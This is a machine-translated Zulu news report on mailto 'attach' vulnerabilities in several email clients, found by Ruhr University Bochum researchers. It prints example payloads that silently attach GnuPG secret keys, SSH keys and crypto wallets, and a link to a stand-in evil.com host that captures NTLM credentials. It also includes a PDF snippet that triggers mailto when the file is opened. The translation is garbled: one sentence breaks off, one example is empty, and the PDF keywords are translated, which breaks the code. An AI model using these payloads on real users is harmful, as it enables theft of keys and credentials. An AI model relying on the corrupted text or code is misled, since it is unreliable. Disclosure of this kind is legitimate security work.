Abacwaningi abavela e-Ruhr University Bochum (Germany)
Izixhumanisi «
Amakhasimende e-imeyili i-Thunderbird, i-GNOME Evolution (CVE-2020-11879), i-KDE KMail (CVE-2020-11880), i-IBM/HCL Notes (CVE-2020-4089) kanye ne-Pegasus Mail babesengozini yokuhlaselwa okuncane okukuvumela ukuthi unamathisele ngokuzenzakalelayo. noma yiliphi ifayela lasendaweni, elicaciswe ngesixhumanisi esifana ne-“mailto:?attach=path_to_file”. Ifayela linamathiselwe ngaphandle kokubonisa isixwayiso, ngakho ngaphandle kokunaka okukhethekile, umsebenzisi angase angaboni ukuthi incwadi izothunyelwa nokunamathiselwe.
Isibonelo, usebenzisa isixhumanisi esifana ne-“mailto:[i-imeyili ivikelwe]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ungafaka okhiye abayimfihlo besuka ku-GnuPG kuhlamvu. Ungakwazi futhi ukuthumela okuqukethwe kwama-crypto wallet (~/.bitcoin/wallet.dat), okhiye be-SSH (~/.ssh/id_rsa) nanoma imaphi amafayela afinyeleleka kumsebenzisi. Ngaphezu kwalokho, i-Thunderbird ikuvumela ukuthi unamathisele amaqembu wamafayela ngemaski usebenzisa izakhiwo ezifana nokuthi "namathisela=/tmp/*.txt".
Ngokungeziwe kumafayela endawo, amanye amaklayenti e-imeyili acubungula izixhumanisi zokulondoloza inethiwekhi nezindlela kuseva ye-IMAP. Ikakhulukazi, Amanothi e-IBM akuvumela ukuthi udlulise ifayela kusuka kunkomba yenethiwekhi lapho ucubungula izixhumanisi ezinjengokuthi “namathisela=\\evil.com\dummyfile”, futhi ubambe imingcele yokuqinisekisa ye-NTLM ngokuthumela isixhumanisi kuseva ye-SMB elawulwa umhlaseli. (isicelo sizothunyelwa kanye nomsebenzisi wamapharamitha wokuqinisekisa wamanje).
I-Thunderbird icubungula ngempumelelo izicelo ezifana nokuthi “attach=imap:///fetch>UID>/INBOX>1/”, ekuvumela ukuthi unamathisele okuqukethwe okusuka kumafolda akuseva ye-IMAP. Ngesikhathi esifanayo, imilayezo ebuyisiwe ku-IMAP, ebethelwe nge-OpenPGP kanye ne-S/MIME, isuswa ukubethela ngokuzenzakalelayo iklayenti lemeyili ngaphambi kokuyithumela. Abathuthukisi beThunderbird babe
Izinguqulo ezindala ze-Thunderbird nazo zazisengozini kwezinye izinhlobo ezimbili zokuhlasela ku-PGP ne-S/MIME ehlongozwe abacwaningi. Ikakhulukazi, i-Thunderbird, kanye ne-OutLook, PostBox, eM Client, MailMate kanye ne-R2Mail2, yayingaphansi kokuhlaselwa okuyinhloko, okubangelwa ukuthi iklayenti lemeyili lingenisa ngokuzenzakalelayo futhi lifaka izitifiketi ezintsha ezithunyelwa emilayezweni ye-S/MIME, evumela umhlaseli ukuhlela ukushintshwa kokhiye basesidlangalaleni asebegcinwe ngumsebenzisi.
Ukuhlasela kwesibili, lapho i-Thunderbird, i-PostBox kanye ne-MailMate okungenwa khona kalula, ilawula izici zendlela yokulondoloza ngokuzenzakalelayo imilayezo esalungiswa futhi ivumela, kusetshenziswa amapharamitha we-mailto, ukuqalisa ukuqanjwa kwemiyalezo ebethelwe noma ukwengezwa kwesiginesha yedijithali yemilayezo engaqondakali, ukudluliswa okulandelayo komphumela kuseva ye-IMAP yomhlaseli. Kulokhu kuhlasela, i-ciphertext idluliselwa ngepharamitha "yomzimba", futhi umaka othi "meta refresh" usetshenziselwa ukuqalisa ikholi kuseva ye-IMAP yomhlaseli. Ngokwesibonelo: ' '
Ukucubungula ngokuzenzakalelayo izixhumanisi ze-“mailto:" ngaphandle kokusebenzisana nabasebenzisi, imibhalo ye-PDF eklanywe ngokukhethekile ingasetshenziswa - isenzo se-OpenAction ku-PDF sikuvumela ukuthi uqalise ngokuzenzakalelayo isibambi se-mailto lapho uvula idokhumenti:
%PDF-1.5
1 0obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0obj
<< /Uhlobo /Isenzo /S /URI/URI (mailto:?body=——QALA UMLAYEZO WE-PGP——[…])>>
endobj
Source: opennet.ru